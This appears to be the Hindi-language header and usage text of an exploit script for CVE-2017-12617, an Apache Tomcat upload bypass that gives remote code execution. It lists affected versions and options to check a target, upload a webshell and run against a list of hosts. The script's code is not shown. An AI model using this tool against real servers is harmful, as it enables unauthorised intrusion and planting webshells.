
Apache Tomcat < 9.0.1 (बीटा) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP अपलोड बायपास / दूरस्थ कोड निष्पादन
CVE-2017-12617 Apache Tomcat में खोजी गई गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता
ऐसे सिस्टम प्रभावित होते हैं जिनमें HTTP PUT सक्षम है (Default सर्वलेट के "read-only" इनिशियलाइज़ेशन पैरामीटर को "false" पर सेट करके)।
Tomcat संस्करण 9.0.1 (Beta), 8.5.23, 8.0.47 और 7.0.82 से पहले के संस्करणों में एक संभावित खतरनाक
रिमोट कोड निष्पादन (RCE) भेद्यता होती है जो सभी ऑपरेटिंग सिस्टमों पर लागू होती है यदि Default सर्वलेट
readonly पैरामीटर को false पर सेट करके कॉन्फ़िगर किया गया हो या WebDAV सर्वलेट को
readonly पैरामीटर false पर सेट करके सक्षम किया गया हो।
./cve-2017-12617.py [options]
विकल्प:
-u ,--url [::] जाँचें कि लक्ष्य URL असुरक्षित है या नहीं
-p,--pwn [::] वेबशेल बनाएँ और उसे अपलोड करें
-l,--list [::] होस्ट्स की सूची
[+]उपयोग:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt